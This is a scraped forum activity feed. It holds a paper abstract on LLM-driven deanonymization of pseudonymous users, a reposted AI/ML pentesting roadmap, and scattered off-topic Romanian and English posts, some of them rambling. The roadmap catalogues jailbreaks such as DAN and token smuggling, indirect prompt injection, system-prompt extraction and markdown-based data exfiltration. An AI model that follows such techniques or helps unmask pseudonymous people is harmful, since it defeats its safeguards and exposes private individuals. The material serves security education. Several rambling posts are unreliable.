All Activity
- Today
-
gg88mov joined the community
-
We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user’s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered. Download: https://arxiv.org/pdf/2602.16800
-
🛡️ AI/ML Pentesting Roadmap A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner. 📋 Table of Contents Prerequisites Phase 1 — Foundations Phase 2 — AI/ML Security Concepts Phase 3 — Prompt Injection & LLM Attacks Phase 4 — Hands-On Practice Phase 5 — Advanced Exploitation Techniques Phase 6 — Real-World Research & Bug Bounty Standards, Frameworks & References Tools & Repositories Books, PDFs & E-Books Video Resources CTF & Competitions Bug Bounty Programs Community & News Suggested Learning Path by Experience Level Prerequisites Before diving into AI/ML pentesting, ensure you have the following foundation: General Security Basics PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.) TryHackMe — Pre-Security Path HackTheBox Academy OWASP Top 10 Programming (Python is essential) Python for Everybody — Coursera Automate the Boring Stuff with Python — Free online book CS50P — Python — Free Harvard course APIs & HTTP Understand REST APIs, HTTP methods, headers, and authentication flows Postman Learning Center Practice with tools: curl, Burp Suite, Postman Phase 1 — Foundations 1.1 Machine Learning Fundamentals Resource Type Cost Machine Learning — Andrew Ng (Coursera) Course Audit Free Introduction to ML — edX Course Audit Free fast.ai Practical Deep Learning Course Free Google Machine Learning Crash Course Course Free Kaggle ML Courses Course Free 3Blue1Brown — Neural Networks Video Free 1.2 Large Language Models (LLMs) Understanding how LLMs work is critical before attacking them. Resource Type Cost Andrej Karpathy — Intro to LLMs Video Free Andrej Karpathy — Let's build GPT Video Free Hugging Face NLP Course Course Free LLM University by Cohere Course Free Prompt Engineering Guide Guide Free Phase 2 — AI/ML Security Concepts 2.1 Core Security Concepts OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems NIST AI Risk Management Framework — Federal AI risk guidance IBM — AI Security Overview AI Village — LLM Threat Modeling Promptingguide — Adversarial Attacks HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI 2.2 Attack Surface Overview Key attack vectors in AI/ML systems: Prompt Injection — Manipulating LLM behavior through crafted inputs Jailbreaking — Bypassing safety filters and guardrails Model Inversion — Extracting training data from a model Membership Inference — Determining if data was in training set Data Poisoning — Corrupting training data to influence behavior Adversarial Examples — Perturbed inputs that fool classifiers Model Extraction/Stealing — Cloning a model via API queries Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools Training Data Exfiltration — Extracting memorized private data Denial of Service — Overloading models via crafted prompts 2.3 MLOps & Infrastructure Security From MLOps to MLOops — JFrog Offensive ML Playbook AI Exploits — ProtectAI Awesome AI Security — ottosulin Phase 3 — Prompt Injection & LLM Attacks 3.1 Understanding Prompt Injection IBM Guide on Prompt Injection Simon Willison's Explanation of Prompt Injection Learn Prompting — Prompt Hacking and Injection PortSwigger LLM Attacks NCC Group — Exploring Prompt Injection Attacks Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection 3.2 Jailbreaking Techniques DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo Role-playing / Persona manipulation Token smuggling — Encoding instructions to bypass filters Prompt leaking — Extracting system prompts Indirect prompt injection — Attacks via documents, web content, memory WideOpenAI — Jailbreak Collection PayloadsAllTheThings — Prompt Injection PALLMs — Payloads for Attacking LLMs 3.3 Indirect Prompt Injection A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes. Greshake — LLM Security / Not What You've Signed Up For Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection GitHub Copilot Chat: Prompt Injection to Data Exfiltration Google AI Studio Data Exfiltration 3.4 Advanced Prompt Attack Techniques How to Persuade an LLM to Change Its System Prompt Bugcrowd Ultimate Guide to AI Security (PDF) Snyk OWASP Top 10 LLM (PDF) Vanna.AI Prompt Injection RCE — JFrog Phase 4 — Hands-On Practice 4.1 Interactive Platforms & Games Platform Description Link Gandalf LLM prompt testing game — extract the password gandalf.lakera.ai Prompt Airlines Gamified prompt injection learning promptairlines.com Crucible Interactive AI security challenges by Dreadnode crucible.dreadnode.io Immersive Labs AI Structured AI security exercises prompting.ai.immersivelabs.com Secdim AI Games Prompt injection games play.secdim.com/game/ai HackAPrompt Community prompt injection competition hackaprompt.com PortSwigger LLM Labs Hands-on web LLM attack labs Web Security Academy 4.2 Vulnerable-by-Design Projects Repository Description Damn Vulnerable LLM Agent — WithSecureLabs Intentionally vulnerable LLM agent ScottLogic Prompt Injection Playground Local prompt injection lab Greshake LLM Security Tools Proof-of-concept attacks 4.3 CTF Writeups to Study CTF Writeup — HackPack CTF 2024 LLM Edition LLM Pentest Writeups — System Weakness Phase 5 — Advanced Exploitation Techniques 5.1 Agent & Tool Integration Attacks When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically. LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec LLM Pentest: Leveraging Agent Integration For RCE (full) Dumping a Database with an AI Chatbot — Synack CSWSH Meets LLM Chatbots 5.2 Data Exfiltration via LLMs Google AI Studio: LLM-Powered Data Exfiltration Google AI Studio Mass Data Exfil (Regression) Hacking Google Bard — From Prompt Injection to Data Exfiltration AWS Amazon Q Markdown Rendering Vulnerability GitHub Copilot Chat Data Exfiltration 5.3 Account Takeover & Authentication Attacks ChatGPT Account Takeover — Wildcard Web Cache Deception Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception) Security Flaws in ChatGPT Ecosystem — Salt Security OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx 5.4 XSS & Web Vulnerabilities in AI Products XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva Zeroday on GitHub Copilot 5.5 Model & Infrastructure Attacks Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9) From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva 5.6 Persistent Attacks & Memory Exploitation ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red 5.7 Adversarial Machine Learning CleverHans Library — Adversarial example library ART (Adversarial Robustness Toolbox) — IBM Foolbox — Python toolbox for adversarial attacks Phase 6 — Real-World Research & Bug Bounty 6.1 Notable Research & Disclosures We Hacked Google AI for $50,000 — LandH New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer Jailbreak of Meta AI (Llama 3.1) Revealing Config Details Bypass Instructions to Manipulate Google Bard My LLM Bug Bounty Journey on Hugging Face Hub Anonymised Penetration Test Report — Volkis Lakera Real World LLM Exploits (PDF) 6.2 How to Find LLM Vulnerabilities Key areas to test when assessing an LLM-powered application: System prompt extraction — Can you leak the hidden system prompt? Instruction override — Can you ignore system-level instructions? Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)? Data exfiltration via markdown — Does the UI render  ? Persistent injection via memory — Can you inject instructions that persist in memory/RAG? PII leakage — Does the model reveal training data or other users' data? Cross-user data leakage — In multi-tenant apps, can you access other users' contexts? Authentication bypass — Can you trick the LLM into performing privileged actions? Standards, Frameworks & References Resource Description OWASP LLM Top 10 Top 10 LLM vulnerability classes MITRE ATLAS AI adversarial threat matrix NIST AI RMF US Federal AI risk management framework OWASP AI Exchange Cross-industry AI security guidance ISO/IEC 42001 International AI management standard ENISA AI Threat Landscape EU AI threat landscape report Google Secure AI Framework (SAIF) Google's AI security framework Tools & Repositories Offensive Tools Tool Purpose Garak LLM vulnerability scanner PyRIT Microsoft's Python Risk Identification Toolkit for LLMs LLM Fuzzer Fuzzing framework for LLMs PALLMs Payloads for attacking LLMs PromptInject Prompt injection attack framework PurpleLlama / CyberSecEval Meta's LLM security evaluation Defensive / Scanning Tools Tool Purpose Rebuff Prompt injection detection NeMo Guardrails NVIDIA guardrail framework Lakera Guard Commercial prompt injection protection AI Exploits — ProtectAI Real-world ML exploit collection ModelScan Scan ML model files for malicious code Reference Lists Resource Description Awesome LLM Security — corca-ai Curated LLM security list Awesome LLM — Hannibal046 Everything LLM including security Awesome AI Security — ottosulin General AI security resources LLM Hacker's Handbook Comprehensive hacking handbook PayloadsAllTheThings — Prompt Injection Payload collection WideOpenAI Jailbreak and bypass collection Chatgpt-DAN DAN jailbreak collection Books, PDFs & E-Books Resource Link LLM Hacker's Handbook GitHub OWASP Top 10 for LLM (Snyk) PDF Bugcrowd Ultimate Guide to AI Security PDF Lakera Real World LLM Exploits PDF HackerOne Ultimate Guide to Managing AI Risks E-Book Adversarial Machine Learning — Goodfellow et al. arXiv Video Resources Resource Link Penetration Testing Against and With AI/LLM/ML (Playlist) YouTube Andrej Karpathy — Intro to Large Language Models YouTube DEF CON AI Village Talks YouTube LiveOverflow — AI/ML Security YouTube 3Blue1Brown — Neural Networks Series YouTube John Hammond — AI Security Challenges YouTube Cybrary — Machine Learning Security Cybrary CTF & Competitions Competition Description Link Crucible Ongoing AI security challenges crucible.dreadnode.io HackAPrompt Annual prompt injection competition hackaprompt.com AI Village CTF (DEF CON) Annual AI security CTF at DEF CON aivillage.org Gandalf Self-paced LLM challenge gandalf.lakera.ai Prompt Airlines Gamified injection challenges promptairlines.com Hack The Box AI Challenges HTB AI-themed challenges hackthebox.com Secdim AI Games Web-based AI security games play.secdim.com/game/ai Bug Bounty Programs AI/ML security bug bounties are growing rapidly. Target these platforms: Program Scope Link OpenAI Bug Bounty ChatGPT, API, plugins bugcrowd.com/openai Google AI Bug Bounty Gemini, Bard, Vertex AI bughunters.google.com Meta AI Bug Bounty Llama models, Meta AI facebook.com/whitehat HuggingFace via ProtectAI Hub, models, spaces huntr.com Anthropic Bug Bounty Claude, API anthropic.com/security Microsoft (Copilot, Azure AI) Copilot, Azure OpenAI msrc.microsoft.com Huntr (AI/ML focused) Open source ML libraries huntr.com Tips for AI bug bounty: Focus on data exfiltration via markdown rendering (common finding) Test plugin/tool integrations thoroughly Look for prompt injection in RAG pipelines Explore memory and persistent context manipulation Check for cross-tenant data leakage in multi-user deployments Community & News Communities AI Village — DEF CON's AI security community OWASP AI Exchange — Open standard for AI security ProtectAI — AI security research and tools Embrace the Red — Blog — Leading blog on LLM security Kai Greshake's Research — Indirect prompt injection research Newsletters & Blogs The Batch — DeepLearning.AI — Weekly AI news Simon Willison's Weblog — Authoritative LLM security commentary HiddenLayer Research — AI security research Lakera Blog — LLM security insights PortSwigger Research — Web + AI security research Suggested Learning Path by Experience Level 🟢 Beginner (0–3 months) Complete PortSwigger Web Security Academy fundamentals Learn Python basics Take Google ML Crash Course Read OWASP LLM Top 10 Play Gandalf — all levels Read Simon Willison's prompt injection article Watch Andrej Karpathy — Intro to LLMs 🟡 Intermediate (3–9 months) Study MITRE ATLAS Matrix Complete PortSwigger LLM Attack labs Set up and exploit Damn Vulnerable LLM Agent Complete Prompt Airlines and Crucible challenges Read the LLM Hacker's Handbook Study the Embrace the Red blog in full Experiment with Garak and PyRIT Try Offensive ML Playbook 🔴 Advanced (9+ months) Participate in AI Village CTF at DEF CON Submit findings to Huntr or OpenAI Bug Bounty Study adversarial ML with ART and CleverHans Read academic papers on model inversion, membership inference, and data extraction Contribute to open source tools like Garak or AI Exploits Build your own vulnerable LLM demo environment Write and publish research — blog posts, CVEs, conference talks Key Academic Papers Paper Year Explaining and Harnessing Adversarial Examples — Goodfellow et al. 2014 Extracting Training Data from Large Language Models — Carlini et al. 2021 Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. 2023 Membership Inference Attacks against Machine Learning Models — Shokri et al. 2017 Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. 2023 Jailbroken: How Does LLM Safety Training Fail? — Wei et al. 2023 Prompt Injection attack against LLM-integrated Applications 2023 Last updated: 2025 | Contributions welcome — submit a PR with new resources. Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection
-
8sc88com joined the community
-
dupa ce prinzi experienta te bagi pe bug bounty ! sa curga banii, bucuria lui gigi becali !
-
bk8codes joined the community
-
Ca pe orice alt tool, il folosim sa livram mai repede. Dar nu avem incredere in el. Verificam informatiile, apoi le folosim.
-
bslengoctuananh joined the community
-
Si cu AI ul ce facem?
-
lilyth joined the community
-
adammass00 changed their profile photo
-
Sa inveti: 1. Partea tehnica - partea cea mai usoara, gasesti documentatie 2. Sa intelegi business - sa stii ce nevoi au companiile (sa vinzi catre oameni B2C e mai putin profitabil in general zic eu) 3. Sa stii sa vorbesti, sa vinzi, sa explici, sa cunosti legislatia - non technical skills - mai greu de prins decat lucrurile tehnice 4. Combini toate informatiile invatate si rezolvi o nevoie a companiilor, aduci valoare (ca la manele) si o vinzi 5. Cresti compania, faci bani si duci o viata buna angajand oameni buni sa lucreze pentru tine
-
nowgoalhunet2 joined the community
-
exact , sa incepi de aici https://www.dnsc.ro/pagini/inregistrare-entitati
-
sunwinheelp joined the community
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
Eu propun sa nu mai incalcati legile sigurantei nationale pentru ca sunteti deja urmariti pana in maduva oaselor cei care faceti CARDING ! am vazut la televizor ca au condamnat un rapper pentru "patrunjel" la nu stiu ce festival.e greu mai acum cu root - flood etc. -
gg88videoo joined the community
-
max79vipcom joined the community
- Yesterday
-
NoRo started following [Q] Sfaturi pentru un viitor in CyberSecurty?
-
Vreau sa incep sa lucrez la ceva pentru viitorul meu, cu ce ar trebuii sa incep pentru un viitor legat de securitatea cibernetica?
-
Cine voteaza sa i dam ban lu jill sa dea emoji la acest post
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
-
Operațiune de influență (influence operation) Acțiuni planificate pentru a modela percepțiile și deciziile unei ținte. Poate include dezinformare, propagandă, manipulare psihologică. Framing / narative manipulation Prezentarea selectivă a informației pentru a induce o concluzie dorită.
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
I give some PHONE NUMBERS !? You are crazy kido ! BUT IF I CALL FBI BECAUSE RST IS STING LIKE R00T-YOU - RYAN1918 AND OTHERS !? JAIL IS NOT GOOD. FOR KIDS I RECOMMAND LIKE A SHRINK MORE REST. The FBI has 56 field offices (also called divisions) centrally located in major metropolitan areas across the U.S. and Puerto Rico. They are the places where we carry out investigations, assess local and regional crime threats, and work closely with partners on cases and operations. Each field office is overseen by a special agent in charge, except our offices in Los Angeles, New York City, and Washington, D.C., which are headed by an assistant director in charge due to their large size. Within these field offices are a total of about 350 resident agencies located in smaller cities and towns. Resident agencies are managed by supervisory special agents. @UnixDevel You can proof that ? You can make a appeal if you are not guilty !? Read more about amendments ! https://constitutioncenter.org/the-constitution/amendments -
@j1ll2013 acum apelez la serviciile americane
-
Cum merge bosilor hackereala pe la birou ?
UnixDevel replied to pehokok715's topic in Discutii non-IT
Bai @j1ll2013 Schimba dealearul frate ca iti vinde nasoale. Trump si echipa stau bine pe ce dump au facut la shit coin-ul lor. -
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
Ok. You heard about Delimano family ? Tell me how many states have SUA !? You heard about financial crisis from America and how harsh times SUA have had in 9/11 ! What do you think about president Donald Trump !? You can tell me wha is difference between SUA and Romania in leadership ? You know that in SUA president is like a prime - minister, and I mean that in Romania president have limited atributions. Dear Ganja, tell me about Frost / Nixon scandal. You know that a American Citzen is well protected all around the world. Please learn more english and we speak later because I am badyguard, but I was born in SUA. Get rich or die train' ! I suggest you to listen Immortal Tehnique all read more about foreign policy or United States. You heard about Obama, Rubio, JD VANCE or Martin Luther King. I have a dream, but Romania live in nightmare. Please put a VPN if you are a black hat hacker because you will get pwned soon if you scan / steal / from all world citznes ! Ok, jail is not for you, but maybe...Search for honeypot's and learn more about OSINT and Big Data. You are monitorized by echelon. But is democracy? We make America great again ! You can treat in SUA for terminal diseases ! Search for TEDx on Youtube, learn more, watch movies and get better day by day. Good Luck ! -
Cristofor Columb a ajuns în America la 12 octombrie 1492, navigând spre vest în căutarea unei rute maritime către Asia. Sprijinit de regii Spaniei, el a traversat Oceanul Atlantic cu trei corăbii: Niña, Pinta și Santa María. Columb a debarcat pe o insulă din Bahamas, pe care a numit-o San Salvador, crezând că a ajuns în Indii. Deși nu a fost primul om care a ajuns în Americi, voiajul său a avut un impact uriaș. Evenimentul a deschis epoca marilor descoperiri geografice, a dus la colonizarea europeană a Americilor și a schimbat profund economia și istoria lumii. Columb a greșit ruta din cauza unor calcule eronate despre mărimea Pământului și despre distanța până în Asia. El a subestimat mult circumferința globului și a supraestimat cât de mult se întinde Asia spre est. Pe baza acestor ipoteze greșite, Columb a crezut că, navigând spre vest peste Atlantic, va ajunge rapid în Japonia sau China.
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
Revoluția Franceză (1789-1799) a fost o perioadă de răsturnări sociale și politice radicale care a abolit monarhia absolută și feudalismul în Franța. Declanșată de criza economică și inegalitățile sociale, a promovat ideile iluministe de „Liberté, égalité, fraternité”. Evenimentele cheie au inclus căderea Bastiliei, Declarația Drepturilor Omului și ascensiunea lui Napoleon. Suntem cu 200 ani in URMA FATA DE FRANTA. WE ARE BEYOND THE FRANCE WITH 200 YEARS. -
Où est le chat ?
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
IAR AM VINT DE LA LUCRU. IARASI PAZA. ERA SA MA OMOARE TIGANETU (RROMI) AU VRUT SA DEA SPARGERE. - Last week
-
yes
-
E indemn sa nu fumezi bre :)))) Daca te indemn sa respecti legea din babuinland, tara lui Mucusor si a serviciilor, nu e nimic ilegal 🤣
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
Consumul și deținerea de droguri pentru uz personal sunt ilegale în România, fiind pedepsite conform Legii 143/2000. Deținerea de droguri de risc (ex. canabis) se pedepsește cu închisoare de la 3 luni la 2 ani sau amendă, iar cele de mare risc (ex. heroină, cocaină) cu închisoare de la 6 luni la 3 ani. Consumatorii pot fi incluși în programe de asistență. inclusiv indemnul se pedepeste parinte Aelius ! -
bre, nu mai fuma påtrunjel
-
Cum merge bosilor hackereala pe la birou ?
j1ll2013 replied to pehokok715's topic in Discutii non-IT
Legea 51/1991 este actul normativ fundamental care definește securitatea națională a României ca starea de legalitate, echilibru și stabilitate necesară dezvoltării statului suveran, unitar și indivizibil, conform Sintact. Aceasta reglementează amenințările la adresa securității și atribuțiile instituțiilor precum SRI, SIE, SPP, MApN, MAI și Ministerul Justiției, coordonate de CSAT SI PUSCARIA TOT PENTRU VIP-URI !? CATE ACESE INTERZISE AVETI FIECARE !? ACUM AM VENIT DE LA PAZA. RAU MERE TREABA.IS DATOR LA BANCA CA AM CUMPARAT APARTAMENT CU, CREDIT. IL SUPARATI PE IEHOVA DAR SI PE PATRIARH ! NOROC CA AM CHLORPOMAZINA PE RETETA.AM INNEBUNIT DE LA ATATA LUCRU. I WANT TO TELL YOU GUYS THAT YOU HAVE BIG TROUBLE. YOU NEED TO PRAY TO GOD TO NOT ENTER IN HOSPITAL BECAUSE YOU ARE TIRED. PLEASE GO TO SLEEP AND TAKE THE PILLS PRESCRIBED FROM PERSONAL DOCTOR. IF YOU DON'T HAVE I SUGGEST TO CALL 911 BECAUSE IS A FINANCIAL CRISIS IN ROMANIA AND YOU NEED TO TAKE URGENT MEASURE.